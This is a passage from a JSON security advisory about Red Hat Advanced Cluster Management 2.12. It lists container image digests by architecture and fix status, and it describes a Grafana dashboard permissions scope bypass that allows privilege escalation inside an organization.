"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433242"
}
],
"notes": [
{
"category": "description",
"text": "An authorization error has been discovered in Grafana dashboards. The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization\u2011internal privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana/grafana/pkg/services/dashboards: Grafana Dashboard Permissions Scope Bypass Enables Cross\u2011Dashboard Privilege Escalation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
